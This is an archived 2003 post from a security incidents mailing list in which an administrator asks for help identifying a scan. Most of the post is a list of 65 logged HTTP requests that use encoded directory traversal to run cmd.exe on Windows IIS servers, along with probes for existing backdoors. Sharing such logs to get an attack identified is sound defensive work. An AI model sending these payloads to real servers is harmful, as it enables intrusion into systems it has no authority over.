Security Incidents mailing list archives

New attack or old Vulnerability Scanner?

From: Mark Embrich <mark_embrich () yahoo com>
Date: 24 Apr 2003 23:43:43 -0000



Hello,

Does anyone recognize this pattern of a TCP connect scan, then 65 GETs?
Note that it also included:  "User-Agent:.Mozilla/3.0.
(compatible;.Indy.Library)...."
For which my googling tells me that this attack/scanner is probably 
built using Borland Delphi/C++ Builder suite.

I've so far received 3 of these from 2 different IP addresses.
The first two were from a Comcast cable user.
The last was from a Cox Communications IP.

Thanks,
Mark Embrich

0.      Scan TCP 80
1.      GET./..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
2.      GET./..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
3.      GET./_vti_bin/.%252e/.%252e/.%252e/.%
252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
4.      GET./_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%
63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
5.      GET./_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%
35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
6.      GET./_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%
63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
7.      GET./_vti_bin/..%255c..%255c..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
8.      GET./_vti_bin/..%255c..%255c..%255c..%255c..%
255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
9.      GET./_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
10.     GET./_vti_bin/..%c0%af../..%c0%af../..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
11.     GET./_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
12.     GET./_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
13.     GET./adsamples/..%255c..%255c..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
14.     GET./adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
15.     GET./cgi-bin/..%255c..%255c..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
16.     GET./cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
17.     GET./iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%
252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
18.     GET./iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
19.     GET./iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
20.     GET./iisadmpwd/..%c0%af../..%c0%af../..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
21.     GET./msadc/.%252e/.%252e/.%252e/.%
252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
22.     GET./MSADC/..%%35%63..%%35%63..%%35%63..%%35%
63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
23.     GET./msadc/..%%35%63../..%%35%63../..%%35%
63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
24.     GET./MSADC/..%%35c..%%35c..%%35c..%%
35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
25.     GET./msadc/..%%35c../..%%35c../..%%
35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
26.     GET./msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%
63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
27.     GET./msadc/..%25%35%63../..%25%35%63../..%25%35%
63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
28.     GET./msadc/..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
29.     GET./msadc/..%255c../..%255c../..%
255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
30.     GET./msadc/..%c0%af../..%c0%af../..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
31.     GET./msadc/..%c0%af../..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
32.     GET./msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%
af../winnt/system32/cmd.exe/?/c/+dir+c:.HTTP/1.1..
33.     GET./msdac/root.exe?/c+dir+c:.HTTP/1.1..
34.     GET./msdac/shell.exe?/c+dir+c:.HTTP/1.1..
35.     GET./PBServer/..%%35%63..%%35%63..%%35%
63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
36.     GET./PBServer/..%%35c..%%35c..%%
35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
37.     GET./PBServer/..%25%35%63..%25%35%63..%25%35%
63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
38.     GET./PBServer/..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
39.     GET./Rpc/..%%35%63..%%35%63..%%35%
63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
40.     GET./Rpc/..%%35c..%%35c..%%
35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
41.     GET./Rpc/..%25%35%63..%25%35%63..%25%35%
63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
42.     GET./Rpc/..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
43.     GET./samples/..%255c..%255c..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
44.     GET./samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
45.     GET./scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
46.     GET./scripts/.%252e/.%
252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
47.     GET./scripts/..%252f..%252f..%252f..%
252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
48.     GET./scripts/..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
49.     GET./scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
50.     GET./scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%
AFwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
51.     GET./scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
52.     GET./scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
53.     GET./scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%
1Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
54.     GET./scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
55.     GET./scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
56.     GET./scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%
9Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
57.     GET./scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
58.     GET./scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
59.     GET./scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
60.     GET./scripts/..%e0%80%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
61.     GET./scripts/..%f0%80%80%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
62.     GET./scripts/..%f8%80%80%80%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
63.     GET./scripts/..%fc%80%80%80%80%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
64.     GET./scripts/root.exe?/c+dir+c:.HTTP/1.1..
65.     GET./scripts/shell.exe?/c+dir+c:.HTTP/1.1..

----------------------------------------------------------------------------
Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the 
world's premier event for IT and network security experts.  The two-day 
Training features 6 hand-on courses on May 12-13 taught by professionals.  
The two-day Briefings on May 14-15 features 24 top speakers with no vendor 
sales pitches.  Deadline for the best rates is April 25.  Register today to 
ensure your place. http://www.securityfocus.com/BlackHat-incidents 
----------------------------------------------------------------------------

Current thread:

New attack or old Vulnerability Scanner? Mark Embrich (Apr 25)
- RE: New attack or old Vulnerability Scanner? Keith (Apr 28)
- <Possible follow-ups>
- RE: New attack or old Vulnerability Scanner? James C. Slora, Jr. (Apr 28)
- Re: New attack or old Vulnerability Scanner? Jason Falciola (Apr 28)
- Re: New attack or old Vulnerability Scanner? rhandwerker (Apr 28)
- Re: New attack or old Vulnerability Scanner? jac (Apr 29)
- Re: New attack or old Vulnerability Scanner? Mark Embrich (Apr 29)
- Re: New attack or old Vulnerability Scanner? Jason Falciola (Apr 30)
- Re: New attack or old Vulnerability Scanner? Jason Falciola (Apr 30)